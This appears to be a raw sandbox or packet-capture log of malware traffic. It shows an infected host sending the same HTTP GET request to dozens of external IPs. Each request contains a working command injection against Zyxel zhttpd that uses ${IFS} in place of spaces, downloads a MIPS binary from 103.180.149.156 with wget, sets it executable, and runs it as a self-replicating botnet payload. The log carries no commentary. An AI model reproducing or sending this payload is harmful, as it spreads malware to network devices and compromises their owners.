                                            Feb 2, 2024 06:21:26.911026001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8009192.168.2.1553600223.15.55.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911070108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8010192.168.2.1539212124.102.68.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911113977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8011192.168.2.1540804205.185.130.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911150932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8012192.168.2.153388467.25.132.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911180019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8013192.168.2.1558198133.67.80.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911240101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8014192.168.2.154938494.225.242.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911268950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8015192.168.2.153542663.22.226.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911328077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8016192.168.2.1543066161.96.38.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911364079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8017192.168.2.15490462.29.56.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911438942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8018192.168.2.1533066204.55.211.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911463976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8019192.168.2.155595876.226.164.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911514997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8020192.168.2.1551406206.27.129.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911559105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8021192.168.2.1533586179.35.146.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911586046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8022192.168.2.1552664125.30.108.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911631107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8023192.168.2.154636041.168.59.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911675930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8024192.168.2.1547042163.253.187.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911708117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8025192.168.2.1543516220.213.61.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911746979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8026192.168.2.1542656113.216.251.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911787987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8027192.168.2.154649064.10.42.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911845922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8028192.168.2.1536824107.8.27.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911876917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8029192.168.2.1540416112.96.181.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911940098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8030192.168.2.1551036206.240.146.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.911977053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8031192.168.2.1546672137.156.35.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912005901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8032192.168.2.1547252196.172.191.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912054062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8033192.168.2.1542164144.21.102.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912085056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8034192.168.2.156088024.135.120.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912137032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8035192.168.2.1556038187.227.151.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912183046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8036192.168.2.154319832.3.186.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912221909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8037192.168.2.1542532142.90.44.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912252903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8038192.168.2.1539438165.200.147.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912301064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8039192.168.2.1533822120.25.38.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912319899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8040192.168.2.1544602203.121.90.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912375927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8041192.168.2.1535474132.160.31.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912406921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8042192.168.2.153704047.54.62.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912434101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8043192.168.2.1548964104.245.97.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912471056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8044192.168.2.155777458.155.136.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912491083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8045192.168.2.1540392162.13.136.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912535906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8046192.168.2.1551184186.71.132.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912585974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8047192.168.2.153983480.19.12.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912609100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8048192.168.2.154764289.22.136.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912672997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8049192.168.2.1550440196.48.8.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912697077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8050192.168.2.1555976149.74.197.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912728071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8051192.168.2.15605304.79.171.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912781954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8052192.168.2.1550662182.33.152.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912821054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8053192.168.2.153719613.145.177.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912894011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8054192.168.2.155451865.245.87.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912926912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8055192.168.2.1535220118.31.116.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.912967920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8056192.168.2.1542872191.178.156.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913026094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8057192.168.2.154599880.33.8.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913070917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8058192.168.2.153560040.175.23.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913110018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8059192.168.2.1556494108.207.18.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913152933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8060192.168.2.154519044.245.150.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913183928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8061192.168.2.1546154189.209.33.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913223982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8062192.168.2.1554858150.101.229.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913260937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8063192.168.2.1534924171.37.31.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913311005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8064192.168.2.1560310159.60.216.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913332939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8065192.168.2.1543234205.129.231.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913392067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8066192.168.2.1538670129.63.245.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913422108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8067192.168.2.154260843.208.219.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913471937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8068192.168.2.155939045.26.49.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913507938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8069192.168.2.153553070.135.192.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913535118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8070192.168.2.15404062.81.229.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913585901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8071192.168.2.155787269.161.166.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:26.913616896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8072192.168.2.1556186182.129.188.5443
                                            TimestampBytes transferredDirectionData
